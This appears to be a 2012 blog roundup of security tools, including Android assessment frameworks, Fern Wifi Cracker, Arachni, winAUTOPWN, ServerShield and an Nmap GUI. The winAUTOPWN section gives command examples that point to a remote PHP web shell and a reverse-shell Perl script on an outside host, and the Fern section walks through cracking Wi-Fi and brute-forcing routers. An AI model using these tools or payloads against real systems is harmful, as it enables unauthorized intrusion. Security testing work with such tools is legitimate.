Thursday, December 20, 2012

Android Application Vulnerability / Security Assessment Tools & Framework

Android Security Evaluation Framework (ASEF) :
                                               performs this analysis while alerting you about other possible issues. It will make you aware of unusual activities of your apps, will expose vulnerable components and help narrow down suspicious apps for further manual research. The framework will take a set of apps (either pre-installed on a device or as individual APK files) and migrate them to the test suite where it will run it through test cycles on a pre-configured Android Virtual Device (AVD).

                            ASEF is a Open Source Project to perform security analysis of Android Apps by various security measures                         

                            ASEF is an Open Source tool for scanning Android Devices for security evaluation. Users will gain access to security aspects of android apps by using this tool with its default settings. An advanced user can fine-tune this, expand upon this idea by easily integrating more test scenarios, or even find patterns out of the data it already collects. ASEF will provide automated application testing and facilitate a plug and play kind of environment to keep up with the dynamic field of Android Security.

YouTude Videos :

Demo : Running ASEF to test all installed android apps from an android device on an Android Virtual Device



Short Demo : Running ASEF to test all installed android apps from an android device on an another physical android device

 

Download Link : Android Security Evaluation Framework


Tools :

Mercury v1.1 Tool - 

                              bug hunters to find vulnerabilities & write proof-of-concept exploits in Android Application. Simple called as Android Apps Vulnerability Scanner. 

 

                            Mercury is a framework for exploring the Android platform; to find vulnerabilities and share proof-of-concept exploits.

                         Mercury allows you to assume the role of a low-privileged Android app, and to interact with both other apps and the system.
  • Use dynamic analysis on Android applications and devices for quicker security assessments
  • Share publicly known methods of exploitation on Android and proof-of-concept exploits for applications and devices
  • Write custom tests and exploits, using the easy extensions interface
Mercury allows you to:
  1. Interact with the 4 IPC endpoints - activities, broadcast receivers, content providers and services
  2. Use a proper shell that allows you to play with the underlying Linux OS from the point of view of an unprivileged application (you will be amazed at how much you can still see)
  3. Find information on installed packages with optional search filters to allow for better control
  4. Built-in commands that can check application attack vectors on installed applications
  5. Transfer files between the Android device and your computer
  6. Create new modules to exploit your latest finding on Android, and playing with those that others have found
                For those of you interested in vulnerabilities in vendor products, the new version is the start of a collection of these in a framework. The first privilege escalation was included, allowing the escalation to root from Mercury’s unprivileged context. A module was created to check for vulnerabilities in content providers discovered on Samsung devices.

Sample results of running this module on a vulnerable version of the Samsung Galaxy SII is shown below:


Running this on the Samsung Galaxy SIII yields the following:

                               

Security consultants Sample Testing :

                  The first set of vulnerabilities found by the MWR team was done manually by reviewing the AndroidManifest.xml of each package on the phone. With Mercury, a combination of the attacksurface command and the the info command in each section will get you the same results in a tenth of the time. If you are interested in looking for common problems on devices, the scanner modules will be of interest to you. As an example, this is scanner.provider.sqlinjection finding SQL injection flaws in default content providers on an Android 4.0.3 Emulator.



                        Don’t get too excited, these SQL injection vulnerabilities don’t lead to any serious information disclosure, but you get the idea right? Don’t just look at content provider problems because these tools are available. Content providers are the tip of the iceberg! Ask us questions or bounce ideas. Create new modules with Mercury. Go forth and innovate!

   Download Link : Mercury v1.1

 

 





Wednesday, December 19, 2012

Fern Wifi Cracker - Wireless Penetration Testing Tool

Fern Wifi Cracker :
                       is a Wireless security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks

                          

Features


Fern Wifi Cracker currently supports the following features:
  • WEP Cracking with Fragmentation,Chop-Chop, Caffe-Latte, Hirte, ARP Request Replay or WPS attack
  • WPA/WPA2 Cracking with Dictionary or WPS based attacks
  • Automatic saving of key in database on successful crack
  • Automatic Access Point Attack System
  • Session Hijacking (Passive and Ethernet Modes)
  • Access Point MAC Address Geo Location Tracking
  • Internal MITM Engine
  • Bruteforce Attacks (HTTP,HTTPS,TELNET,FTP)
  • Update Support

Operating System Supported

The Software runs on any Linux machine with the programs prerequisites, But the program has been tested on the following Linux based operating systems:

Prerequisites

The Program requires the following to run properly:
The following dependencies can be installed using the Debian package installer command on Debian based systems using "apt-get install program" or otherwise downloaded and installed manually

    Installation

    Installation on Debian Package supported systems:

    root@host:~# dpkg -i Fern-Wifi-Cracker_1.6_all.deb



    Screenshot :

    Aim 

    • Crack the Wifi using Fern Wifi Cracker . 

    HOW TO OPEN FERN-WIFI-CRACKER

    • To open fern , follow the steps - 
    • Backtrack > Exploitation Tools > Wireless Exploitation Tools >WLAN Exploitation >fern-wifi-cracker 
    • See the below image for more details - 

    SELECT INTERFACE

    • First step is to select the interface .
    • Here in my case i have selected wlan0 interfaec .
    • See the below image for more details - 
    SCANNING ACCESS POINT 
    • To scan for Access Point click on the 2nd button ( wifi icon ).
    • See the below image for more details -
    • Once you get the Access Point , various AP's of WEP and WPA are detected .
    • See the below image for more details-

     

    WPA Cracking with WPS Attack:

    Video Tutorial :

    Session Hijacking With Fern Wifi Cracker


    Bruteforcing Routers with Fern-Wifi-Cracker


     
    Download Link : Click Here

    Tuesday, December 18, 2012

    Arachni - Web Application Security Scanner Framework

    Arachni :
                is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. Arachni is smart, it trains itself by learning from the HTTP responses it receives during the audit process.
    Unlike other scanners, Arachni takes into account the dynamic nature of web applications and can detect changes caused while travelling through the paths of a web application̢۪s cyclomatic complexity.

    This way attack/input vectors that would otherwise be undetectable by non-humans are seamlessly handled by Arachni.








    Currently available modules:

    • Audit:
      • SQL injection
      • Blind SQL injection using rDiff analysis
      • Blind SQL injection using timing attacks
      • CSRF detection
      • Code injection (PHP, Ruby, Python, JSP, ASP.NET)
      • Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
      • LDAP injection
      • Path traversal
      • Response splitting
      • OS command injection (*nix, Windows)
      • Blind OS command injection using timing attacks (*nix, Windows)
      • Remote file inclusion
      • Unvalidated redirects
      • XPath injection
      • Path XSS
      • URI XSS
      • XSS
      • XSS in event attributes of HTML elements
      • XSS in HTML tags
      • XSS in HTML ‘script’ tags
    • Recon:
      • Allowed HTTP methods
      • Back-up files
      • Common directories
      • Common files
      • HTTP PUT
      • Insufficient Transport Layer Protection for password forms
      • WebDAV detection
      • HTTP TRACE detection
      • Credit Card number disclosure
      • CVS/SVN user disclosure
      • Private IP address disclosure
      • Common backdoors
      • .htaccess LIMIT misconfiguration
      • Interesting responses
      • HTML object grepper
      • E-mail address disclosure
      • US Social Security Number disclosure
      • Forceful directory listing




    Sample Report :






    To scan via the user-friendlier Web User Interface, just run:

    arachni_web_autostart
     
    This will setup a Dispatcher and fire-up the WebUI server for you.

    Then, point your browser to http://localhost:4567, accept the default settings and start the scan.



    Download Link : Click Here


    Wednesday, December 12, 2012

    winAUTOPWN - Automated Vulnerability Testing

    WinAUTOPWN: 

                           is a minimal Interactive Exploit Framework which acts as a frontend for quick systems vulnerability exploitation. It is a collection of remote exploits using which one can compromise vulnerable systems. winAUTOPWN takes inputs like IP address, Hostname, CMS Path, etc. and does a smart multi-threaded portscan for TCP ports 1 to 65535. Open ports are then recognized and exploits applicable to those ports are executed with the aim of gaining a remote shell or the ability to run remote commands in certain cases.


                                       WINDOWS AUTOPWN or winAUTOPWN is an auto shell gaining // security penetration tool. It can also be used to test IDS, IPS and other monitoring sensors/softwares.


                                   Besides the above, winAUTOPWN can also be used as an efficiency testing tool for Intrusion Detection Systems (IDS) and Web Application Filters (WAF). winAUTOPWN has a vast repository of exploits for various Operating systems like Microsoft Windows, Apple MAC OSX, Linux (various), BSD systems as well as for well-known services and daemon software. winAUTOPWN also contains a massive database of Shell Upload Vulnerability, Remote File Inclusion and Remote Command Execution exploits. These can be fired one after the other instantly and this can aide is checking if the WAF is preventing / alerting accordingly against such threats or no. Similarly shell aiming exploits too can be fired up in a row to test the strength and effectiveness of IDS and IPS.

                                    WinAUTOPWN also has a BSD based cousin called bsdAUTOPWN. bsdAUTOPWN is a just like winAUTOPWN but is not an exact recompilation of winAUTOPWN. It has been written from scratch for and on FreeBSD OS to match the power and functionality offered by the Operating System. Like winAUTOPWN, even bsdAUTOPWN has a multi-threaded portscan feature and it too detects open ports and attempts to exploit them accordingly using the available exploits in the arsenal. We’ll come to a detailed discussion about bsdAUTOPWN later.



     
    Windows GUI as well, which takes similar inputs and feeds it to the main winAUTOPWN console:


    How to use command-line in winAUTOPWN ?

    Command-line usage has always been a mark of a power user in any console based penetration testing tool. winAUTOPWN’s entire interactive interface can be pre-fed with values using command line options as explained below :
    • -skipscan This option can force winAUTOPWN to skip the port-scan module and use the file OpenPorts.TXT in the directory. This is a useful feature when you know what open ports are available on your target system. One can just fill in the port numbers and save the file. This is also helpful in situations when you want winAUTOPWN to check for exploits for one or a few particular ports.
      Example winAUTOPWN.exe –skipscan
    • -onlyscan This option can force winAUTOPWN to skip the entire exploit testing modules. Hence, by using this module winAUTOPWN will only perform a PortScan and will exit after printing the list of OpenPorts .
      Example winAUTOPWN.exe –onlyscan
    • -targetIP This option can be used to provide the Target IP address of the system being tested. Ensure that you specify the IP address after it.
      Example winAUTOPWN.exe –targetIP 192.168.3.3
    • -targetHOST This option can be used to provide the Target Hostname of the system being tested. Ensure that you specify the complete Netbios name for Windows systems on LAN and the entire domain name for Target Systems on WAN.
      Example winAUTOPWN.exe –targetHOST SYSTEM-2
      winAUTOPWN.exe –targetHOST www.somewebsite9.com
    • -attackerIP This option can be used to provide your own IP, which is the Attacker’s IP address of the system from where winAUTOPWN is being run. Ensure that you specify the IP address after it.
      Example winAUTOPWN.exe –attackerIP 192.168.3.34
    • -cmsPATH This option can be used to specify the Content Management System directory name in the URL. Generally this is the first directory name right after the end of the Domain name or the IP address. Ensure that you specify the correct cmsPATH. You can leave this blank if you do not intend to test the web application vulnerability exploits.
      Example winAUTOPWN.exe –cmsPATH /xampp
    • -actcmsPATH This option can be used to specify the Actual Content Management System or the internal Actual CMS Path of the URL. Generally this is not visible in the URL. A lot of times CMS packages installed on the webserver have a default path making it easily guessable. Ensure that you specify the correct actcmsPATH. You can leave this blank if you do not intend to test the web application vulnerability exploits.
      Example winAUTOPWN.exe –actcmsPATH /Applications/xampp
      winAUTOPWN.exe –actcmsPATH /opt/xampp
    • -phpshellPATH This option can be used specify the path of the online PHP Web-shell which would be used along with the Remote File Inclusion Vulnerability Exploits. There is a default encoded PHP web-shell path. To change it, ensure that you specify the correct phpshellPATH which accepts a variable named CMD to execute system commands. The GET request should look like http://shellp.ath/shell.php?CMD=ls
      You can leave this blank if you do not intend to test the web application vulnerability exploits.
      Example winAUTOPWN.exe –phpshellPATH http://website.moc/folder/r57.txt
    • -actphpshellPATH This option can be used specify the actual internal path of the online PHP Web-shell which would be used along with the Remote File Inclusion Vulnerability Exploits. You can leave this blank if you do not intend to test the web application vulnerability exploits.
      Example winAUTOPWN.exe –actphpshellPATH /var/log/tmp
    • -cmsadminUSR This option can be used specify the administrator /admin username if known. This is required for a few web-app exploits to work correctly. You can leave this blank if you do not intend to test the web application vulnerability exploits.
      Example winAUTOPWN.exe –cmsadminUSR admin9
    • -ftpUSR This option can be used specify the FTP User name if known. This is required for a few FTP exploits to work correctly. If you leave this blank winAUTOPWN will set an internal default FTP Username.
      Example winAUTOPWN.exe –ftpUSR user6
    • -ftpPASSWD This option can be used specify the FTP Password if known. This is required for a few FTP exploits to work correctly. If you leave this blank winAUTOPWN will set an internal default FTP Password.
      Example winAUTOPWN.exe –ftpPASSWD S3cR37P@55W0rD
    • -perlrevshURL This option can be used specify the path of a remote Perl script which should be able to send a /bin/sh or an equivalent shell to a remote IP. The script should ideally have the capability to be invoked as perl . Note that the remote_IP will be your IP to which your target will connect and the remote_port will be a port opened on your IP. You do not have to worry about providing parameters to the Perl file or opening the port locally, winAUTOPWN will automatically handle it, because that’s what WINDOWS AUTOPWN actually means. Also note that any Perl script with these capabilities can be used and can be hosted on any webserver. This option just needs the path to this Perl file. This Perl script will be pointed to and used in a few exploits in which a remote connect back shell is used as a payload. There is a default Perl shell path encoded so if you have no clue or an online resource, you can leave this option blank and winAUTOPWN will try to handle it on its own.
      Example winAUTOPWN.exe –perlrevshURL http://website.moc/various/reverse-shell.pl
    • -mailFROM This option can be used to specify the sender’s email address to be used in a few SMTP exploits. This field has a default sender’s email address crafted by winAUTOPWN. It is always root@ where target hostname is the –targetHOST provided earlier. You can set a value to this field to override the default value set.
      Example winAUTOPWN.exe –mailFROM admin@some.web.info
    • -mailTO This option can be used specify the receiver’s email address to be used in a few SMTP Exploits. This field has a default receiver’s email address crafted by winAUTOPWN. It is always postmaster@ where target hostname is the –targetHOST provided earlier. You can set a value to this field to override the default value set.
      Example winAUTOPWN.exe –mailTO postmaster@some.web.info
    • -proxyIP This option can be used to provide the Proxy Server IP address. Do note that only a few exploits support Proxies and that too if you have supplied a Proxy IP and a Proxy port. Ensure that you specify the correct Proxy IP address after it.
      Example winAUTOPWN.exe –proxyIP 192.168.3.80
    • -proxyPORT This option can be used to provide the Proxy Server Port Number. Do note that only a few exploits support Proxies and that too if you have supplied a Proxy IP and a Proxy port. Ensure that you specify the correct Proxy Port Number address after it.
      Example winAUTOPWN.exe –proxyIP 8080


      What are the other WELF Scripting Terminologies?

      can be , , OR (for exe files)
      is the filename of the Exploit. Ex: exploitname.exe
      is your Target’s IP address. Ex: 10.40.140.1
      is your Target’s Hostname. Ex: www.somegate.com OR TSUNAMI-MP11
      is your IP. Ex: 10.40.140.144
      is the Target CMS Path. Ex: /awstats
      is the Actual CMS Path on the disk. Ex: /usr/home/www/awstats
      is an online URL for a php shell. Ex: http://www.shell.com/phpshell.txt
      is a admin username for the Target CMS.
      is FTP/CMS Username
      is FTP/CMS Password.
      is Proxy IP address to be used for some exploits to pass through
      is Proxy Port Number to be used for some exploits to pass through
      is the CMS Path with a trailing slah. Ex: /awstats/
      is the Actual CMS Path on the disk with a trailing slash. Ex: /usr/home/www/awstats/
      is the typical complete address of the Target Hostname alongwith the CMS Path. Ex: www.somesite.com/awstats<
      is the typical complete address of the Target Hostname alongwith the CMS Path with a trailing slash. Ex: www.somesite.com/awstats/
      is the CMS path following the standard http:// . Ex: http://www.somesite.com/awstats
      is the Target HostName following the standard http:// . Ex: http://www.somesite.com
      is the online URL for a perl reverse connect script. Ex. http://vrac.fifi.be/warehouse/various/reverse-shell.pl
      is the sender’s email address to be used in a few SMTP exploits.
      is the receiver’s email address to be used in a few SMTP exploits.
      Sample welf script (myWELFexploits.txt) with three exploits to be loaded:
      PERL webframe_0.76_RFI(c99)-xplt_method3.pl -vuln -shell ^^^^
      PYTHON Steamcast(HTTP_Request)_(SEH)_Rem_Buf_Ovrflw_xplt.py 80 100 ^^^^
      bitweaver_firecmd.exe ^^^^

      To run the above script, as mentioned earlier run
      winAUTOPWN.exe –welf myWELFexploits.txt 


    Download Link : Click Here

    Back-up Link : Click Here

    Reference link : Click Here

    Direct Link : Click Here

    ScoopyNG - VMware detection tool

    ScoopyNG:
                 combines the detection tricks of Scoopy Doo and Jerry as well as some new techniques to determine if a current OS is running inside a VMware Virtual Machine (VM) or on a native system.

    ScoopyNG should work on all modern uni-, multi- and multi-core cpu's.




    ScoopyNG is able to detect VMware even if "anti-detection-mechanisms" are deployed.

    Download : 
                     Windows Version: ScoopyNG v1.0

    Wednesday, October 17, 2012

    ServerShield - Open Source Linux Hardening Tool

    Server Shield:
                is a lightweight method of protecting and hardening your Linux server. It is easy to install, hard to mess up, and makes your server instantly and effortlessly resistant to many basic and advanced attacks

    Automatic security updates are enabled by default, including the self-updating of Server Shield. If you are running a modified version of Server Shield you should turn self-updating off so your changes don't get overwritten. Support for servers with multiple IP addresses will be added soon.

    Features

    • Slowloris Protection
    • Firewall Hardening
    • TCP Hardening
    • ICMP/Ping Flood Protection
    • DoS Protection
    • Spoof Protection
    • FTP/SSH Bruteforce Protection
    • Automatic Security Updates
    • Disables Bash History
    • DNS Amplification Protection

    Installation

    git clone https://github.com/Brian-Holt/server-shield
    
    cd server-shield;chmod +x sshield;mv sshield /etc/init.d
    
    /etc/init.d/sshield start    
    

    Requirements

    Server Shield depends on several pieces of open source software to function properly. If yum is available, the following packages will be silently installed and kept up to date:
    • yum-security
    • iptables
    • nmap
    • net-tools
    • sed
    • gawk
    • git
    • apache-devel
     Download Link : Click Here

     Reference Link : Click Here

    Friday, August 24, 2012

    NmapSI4 - Port Scanner ( Nmap GUI )

    NmapSI4 :

                 Qt4-based Gui Tools with the design goals to provide a complete Nmap GUI interface for Users, in order to management all options of this powerful security net Port & Vulnerability Scanner!









    Features


    • Traceroute support with Nmap
    • Host Lookup with internal implementation or dig.
    • Search services vulnerabilities with Webkit dedicated browser.
    • Full Nmap NSE support.
    • Search network IPS with "Network Discover" tool.
    • Support for create scan user profile.
    • Host scan with Nmap.

     Snapshots :





    Download Link :

    Google Code : Click Here
    Source Forge : Click Here

    Thanks To ALL .